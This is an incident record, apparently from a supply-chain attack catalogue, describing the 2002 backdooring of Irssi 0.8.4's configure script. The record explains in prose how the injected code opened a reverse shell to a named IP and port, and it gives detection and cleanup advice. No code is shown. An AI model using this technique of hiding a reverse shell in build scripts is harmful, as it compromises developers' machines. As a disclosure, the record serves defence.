Irssi configure script backdoored
The irssi.org server was cracked, and the official Irssi 0.8.4 source distribution served a modified configure script for about two months.
Story
In March 2002, irssi.org was cracked and the Irssi 0.8.4 source distribution was altered through its configure script. For roughly two months, users building from the official source archive could execute attacker-added C code before they ever ran the IRC client. The project disclosed the compromise on May 25 and noted that binaries were not affected.
The delivery point was the build system. The archive still looked like Irssi source, but configure carried the hostile logic. That made the user's normal compile step the execution point, before package install, service startup, or IRC traffic.
The injected code looked like a small autoconf test, but it forked, opened a TCP connection to 204.120.36.206 on port 6667, and duped standard input, output, and error to that socket. The practical detection advice was equally direct: grep the source tree for SOCK_STREAM in configure, replace the source, and verify future releases with the author's GPG key.
The cleanup question was therefore about provenance, not configuration. Anyone who built Irssi 0.8.4 from the affected source window had to treat the build host as exposed, even if the installed IRC client itself looked normal or had never connected to a server.
Affected Artifacts
- Observed
- 2002-03-14 to 2002-05-25
- Compromised Versions
- Fixed
- Not listed
- Evidence
- distribution: irssi.org/files/irssi-0.8.4.tar.gz, observable: 204.120.36.206:6667, file: configure, observable: SOCK_STREAM
Incident Context
- Motive
- Unauthorized Access
- Cause
- Website Compromise
- Transitive
- No
External References
- irssi.org cracked, irssi's configure backdoored for past two monthsirssi.org
- irssi backdoorartofhacking.com
- NVD: CVE-2002-1840nvd.nist.gov
- CVEFeed: CVE-2002-1840cvefeed.io
Source record: oss/attacks/irssi/meta.yaml